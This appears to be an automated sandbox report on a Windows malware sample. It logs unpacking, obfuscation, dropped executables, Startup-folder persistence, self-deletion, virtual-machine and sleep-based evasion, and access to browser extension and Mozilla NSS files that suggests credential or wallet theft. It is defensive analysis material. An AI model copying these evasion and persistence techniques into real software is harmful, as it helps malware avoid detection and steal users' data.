Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: AhB0i1fe7I.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: +9\a3C:\vuwesatubezin wozejoyo.pdb source: AhB0i1fe7I.exe
Source:	Binary string: C:\bicuh\zobadeyajikodo\kukotibolufunu\hadisat.pdb`I source: 45C4.exe, 00000013.00000000.391115493.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000000.409632573.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000017.00000000.410357794.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 0000001A.00000000.435229767.000000000048F000.00000002.00020000.sdmp, SmartClock.exe.19.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.27.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.27.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.27.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.27.dr
Source:	Binary string: C:\vuwesatubezin wozejoyo.pdb source: AhB0i1fe7I.exe
Source:	Binary string: C:\bicuh\zobadeyajikodo\kukotibolufunu\hadisat.pdb source: 45C4.exe, 00000013.00000000.391115493.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000000.409632573.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 00000017.00000000.410357794.000000000048F000.00000002.00020000.sdmp, SmartClock.exe, 0000001A.00000000.435229767.000000000048F000.00000002.00020000.sdmp, SmartClock.exe.19.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.27.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.27.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Unpacked PE file: 19.2.45C4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 23.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 26.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Unpacked PE file: 27.2.A8D4.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Unpacked PE file: 0.2.AhB0i1fe7I.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.jezuvak:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\jajvesg	Unpacked PE file: 14.2.jajvesg.400000.0.unpack .text:ER;.rdata:R;.data:W;.jezuvak:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Unpacked PE file: 19.2.45C4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.paceho:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.paceho:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 23.2.SmartClock.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.paceho:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 26.2.SmartClock.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.paceho:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Unpacked PE file: 27.2.A8D4.exe.400000.0.unpack .text:ER;.data:R;.data:W;.rsrc:W;.fert:W; vs .text:ER;.rdata:R;.data:W;

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00402C1B push esi; iretd	0_2_00402C1C
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040E4FD push ds; iretd	0_2_0040E50E
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00416524 push eax; ret	0_2_00416542
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F11B6B push ebp; iretd	0_2_02F11B6D
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F12A54 push eax; ret	0_2_02F12A55
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F12A57 push ds; iretd	0_2_02F12A58
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F11D59 push ecx; retf	0_2_02F11D64
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F12749 push esi; iretd	0_2_02F1274A
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F12118 push eax; ret	0_2_02F12121
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00402C1B push esi; iretd	14_2_00402C1C
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00416524 push eax; ret	14_2_00416542
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_030A2C6B push esi; iretd	14_2_030A2C6C
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0041D1BC push eax; retn 0041h	19_2_0041D1E1
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0041CA40 pushad ; retn 0041h	19_2_0041CBB9
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0041BB1C pushad ; retn 0041h	19_2_0041BB45
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040A446 push ecx; ret	19_2_0040A459
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004075A2 push eax; mov dword ptr [esp], ecx	19_2_004075A7
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_04CE2510 push esi; ret	19_2_04CE2527
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0041D1BC push eax; retn 0041h	22_2_0041D1E1
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0041CA40 pushad ; retn 0041h	22_2_0041CBB9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0041BB1C pushad ; retn 0041h	22_2_0041BB45
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A446 push ecx; ret	22_2_0040A459
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004075A2 push eax; mov dword ptr [esp], ecx	22_2_004075A7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_04C32510 push esi; ret	22_2_04C32527
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0041D1BC push eax; retn 0041h	23_2_0041D1E1
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0041CA40 pushad ; retn 0041h	23_2_0041CBB9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0041BB1C pushad ; retn 0041h	23_2_0041BB45
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040A446 push ecx; ret	23_2_0040A459
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004075A2 push eax; mov dword ptr [esp], ecx	23_2_004075A7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_04CF2510 push esi; ret	23_2_04CF2527
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0041D1BC push eax; retn 0041h	26_2_0041D1E1

PE file contains sections with non-standard names

Source: AhB0i1fe7I.exe	Static PE information: section name: .jezuvak
Source: 45C4.exe.3.dr	Static PE information: section name: .paceho
Source: A8D4.exe.3.dr	Static PE information: section name: .fert
Source: jajvesg.3.dr	Static PE information: section name: .jezuvak
Source: SmartClock.exe.19.dr	Static PE information: section name: .paceho
Source: mozglue.dll.27.dr	Static PE information: section name: .didat
Source: msvcp140.dll.27.dr	Static PE information: section name: .didat
Source: mozglue[1].dll.27.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.27.dr	Static PE information: section name: .didat

Source: initial sample	Static PE information: section name: .text entropy: 7.37520443918
Source: initial sample	Static PE information: section name: .text entropy: 7.97197872693
Source: initial sample	Static PE information: section name: .text entropy: 7.37520443918
Source: initial sample	Static PE information: section name: .text entropy: 7.97197872693

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jajvesg

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	File created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\jajvesg	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\Taxao[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A8D4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\45C4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll	Jump to dropped file

Boot Survival:

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\ahb0i1fe7i.exe

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\jajvesg:Zone.Identifier read attributes | delete

Creates files in alternative data streams (ADS)

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe

File created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe:Zone.Identifier

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Delayed program exit found

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004011E2 Sleep,ExitProcess,	19_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004011E2 Sleep,ExitProcess,	22_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004011E2 Sleep,ExitProcess,	23_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_004011E2 Sleep,ExitProcess,	26_2_004011E2

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 6156	Thread sleep time: -36700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6152	Thread sleep time: -44900s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe TID: 664	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe

Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 580	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 367	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 449	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 418	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll	Jump to dropped file

Is looking for software installed on the system

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior

Source: explorer.exe, 00000003.00000000.301650991.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.301650991.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.267636663.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: SmartClock.exe, 00000016.00000003.425862940.0000000005511000.00000004.00000001.sdmp	Binary or memory string: XrcfcBurCQSyKfUqMJ2qEMU6FmoBmhanhh
Source: explorer.exe, 00000003.00000000.267636663.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000003.00000000.263447837.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SmartClock.exe, 00000016.00000002.517352536.00000000055F0000.00000004.00000001.sdmp	Binary or memory string: LWqVMci5qHvUnsKpwcYNY7RXNZt5vS6LEY1
Source: explorer.exe, 00000003.00000000.285879491.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000003.00000000.267636663.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000003.00000000.285879491.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.299480984.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: SmartClock.exe, 00000016.00000002.516400771.0000000005490000.00000004.00000001.sdmp	Binary or memory string: 12Rvkx1Qnn4xRxT7eBSbHGfSJhrJ9dXfc4
Source: explorer.exe, 00000003.00000000.267914586.0000000008CC6000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040F64C FindFirstFileExW,	19_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040F64C FindFirstFileExW,	22_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040F64C FindFirstFileExW,	23_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040F64C FindFirstFileExW,	26_2_0040F64C

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

System information queried: ModuleInformation

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	System information queried: CodeIntegrityInformation			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F10083 push dword ptr fs:[00000030h]	0_2_02F10083
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_030A092B mov eax, dword ptr fs:[00000030h]	14_2_030A092B
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_030A0D90 mov eax, dword ptr fs:[00000030h]	14_2_030A0D90
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	19_2_0040E0E2
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004106D5 mov eax, dword ptr fs:[00000030h]	19_2_004106D5
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_04CE0083 push dword ptr fs:[00000030h]	19_2_04CE0083
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	22_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004106D5 mov eax, dword ptr fs:[00000030h]	22_2_004106D5
